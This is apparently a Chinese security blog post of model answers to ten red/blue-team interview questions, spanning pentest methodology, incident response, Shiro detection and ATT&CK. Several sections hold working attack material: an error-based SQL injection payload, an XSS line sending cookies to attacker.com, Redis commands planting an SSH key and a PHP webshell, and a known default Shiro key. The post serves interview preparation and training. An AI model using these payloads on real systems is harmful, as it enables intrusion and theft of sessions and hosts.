安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 24
1、自我介绍 2、渗透测试流程,有没有打过内网 3、SQL注入,报错 4、XSS,反射/DOM型,怎么利用 5、Redis的利用 6、应急响应能力怎么样,处置流程思路 7、无态势感知,安全设备,怎样手动发现shiro反序列化漏洞进来都攻击 8、平时有分析研究漏洞吗,编写exp,熟悉什么开发语言 9、关于hook了解 10、ATT&CK框架了解吗、到什么程度,是否有过应用1. 自我介绍
2. 渗透测试流程 & 内网经验
标准化流程(PTES框架):
- 情报收集:WHOIS/子域名/端口扫描(Nmap/Masscan)
- 威胁建模:识别高价值目标(域控、数据库、SVN)
- 漏洞分析:自动化扫描(Nessus/AWVS)+ 手工验证(Burp Suite)
- 渗透利用:突破边界(Web漏洞/弱口令)→ 内网横向移动
- 后渗透阶段:权限维持(Golden Ticket/影子凭证)、数据窃取
- 报告输出:风险评级+修复建议
内网渗透关键动作:
- 横向移动:
- 协议利用:SMB爆破(Responder)、WinRM执行
- 凭据窃取:Mimikatz抓取内存密码 → 密码喷洒攻击
- 权限提升:
- Windows:MS14-068(Kerberos漏洞)、JuicyPotato提权
- Linux:SUID滥用(find/bash)、DirtyPipe(CVE-2022-0847)
- 域控攻陷:
- DCSync攻击获取krbtgt哈希 → 伪造域管令牌
3. SQL注入(报错型)
原理:触发数据库错误回显敏感信息
经典Payload:sql' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--利用场景:
- MySQL:
floor(rand()*2)+group by触发主键冲突- MSSQL:
convert(int,@@version)强制类型转换- Oracle:
ctxsys.drithsx.sn()调用无效函数防御绕过:
- 混淆:Hex编码/注释符插入(
/**/)- WAF绕过:分块传输(Chunked Encoding)+ 异常HTTP方法
4. XSS利用(反射型/DOM型)
类型 触发机制 利用场景 反射型 恶意参数在HTTP响应中原样输出 钓鱼邮件嵌入短链接劫持会话 DOM型 前端JS解析URL参数动态修改DOM 绕过CSP限制(如 eval(location.hash))高级利用技术:
- 会话劫持:
javascriptfetch('https://attacker.com/?cookie='+document.cookie)- DOM Clobbering:
覆盖全局变量 → 绕过过滤逻辑(如<a id=config href="恶意数据">)- CORS绕过:
结合XSS + 缺乏Origin验证 → 读取跨域敏感接口
5. Redis未授权访问利用
攻击路径:
- 写入SSH密钥:
bashredis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3NzaC...公钥内容" | redis-cli -h 目标IP -x set crackit redis-cli -h 目标IP config set dir /root/.ssh/ redis-cli -h 目标IP config set dbfilename authorized_keys redis-cli -h 目标IP save- Webshell写入:
bashconfig set dir /var/www/html/ config set dbfilename shell.php set payload "<?php system($_GET['c']);?>" save- 主从复制RCE(4.x-5.0.5):
bashredis-cli -h 目标IP SLAVEOF 攻击者IP 6379 # 攻击端启动恶意Redis实例,加载module.so 执行命令
6. 应急响应流程
PDCERF模型实战应用:
- 准备阶段:
- 工具包:LogParser/Volatility/Autopsy + 硬盘镜像设备
- 检测阶段:
- 异常指标:CPU暴增(挖矿)/ 外连C2(netstat -an)
- 日志分析:
- Windows:
Event Viewer→ 事件ID 4624/4625(登录)- Linux:
/var/log/auth.log(SSH爆破)- 抑制阶段:
- 隔离主机:防火墙阻断出站(
iptables -A OUTPUT -d C2_IP -j DROP)- 关停服务:停用受影响应用(如Apache)
- 根因分析:
- 内存取证:使用Volatility查找恶意进程
- 文件排查:
find / -mtime -1(24小时内修改文件)- 恢复阶段:
- 重置密码:所有关联账户
- 重装系统:彻底清除后门
- 总结报告:
- 攻击时间线重建 + IOCs(HASH/IP/域名)提交威胁情报
7. 手动检测Shiro反序列化
无设备时的关键线索:
- Cookie特征:
- 查找
rememberMe=deleteMe(Shiro默认Cookie)- 观察长度变化:有效Payload > 128字节
- 响应异常:
- 无效密钥时返回
Set-Cookie: rememberMe=deleteMe- 有效密钥但恶意Payload → 无错误但触发RCE
- 密钥爆破:
- 使用已知密钥字典(如kPH+bIxk5D2deZiIxcaaaA==)
- 配合Ysoserial生成CommonsBeanutils1的Payload
- 流量特征:
- HTTP请求中Cookie长度显著增加(Base64编码的序列化数据)
8. 漏洞研究与开发能力
- 研究方向:
- 重点:Java反序列化(Fastjson/Jackson)、RCE逻辑漏洞(Confluence/Jenkins)
- 漏洞复现:搭建Vulhub环境验证CVE
- EXP开发:
- 语言:Python(POC脚本)、Java(JNDI注入工具)、C(Shellcode编写)
- 案例:编写Shiro Padding Oracle漏洞利用工具(CBC模式密钥爆破)
- 工具链:
- 调试:IDEA + JNDI-Injection-Exploit
- 抓包:Burp Suite插件开发(自定义扫描逻辑)
9. Hook技术理解
应用场景:
- 攻击方:
- API Hook:劫持系统函数(如Windows API
WriteFile())- 浏览器Hook:Chrome扩展注入JS监听表单提交
- 防御方:
- 用户态Hook:Detours库监控进程行为
- 内核态Hook:Sysmon过滤恶意驱动加载
工具示例:- Frida:动态注入JS脚本拦截Android函数
javascriptInterceptor.attach(Module.getExportByName('libc.so', 'open'), { onEnter: function(args) { console.log(" 打开文件: " + Memory.readCString(args[0])); } });
10. ATT&CK框架实战
掌握程度:
- 战术层映射:
- 初始访问:T1190(利用公开应用漏洞)
- 持久化:T1053.005(Systemd定时任务)
- 防御绕过:T1620(反射DLL注入)
- 技术层应用:
- 红队:基于TTPs设计攻击路径(如T1078 → 利用合法账户)
- 蓝队:
- 创建检测规则:Sigma规则识别PsExec使用(T1569.002)
- 威胁狩猎:查询日志中LSASS内存转储行为(T1003.001)
实战案例:- 在EDR中部署ATT&CK检测策略:
- 监控注册表键
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree(T1053.005)
2157

被折叠的 条评论
为什么被折叠?



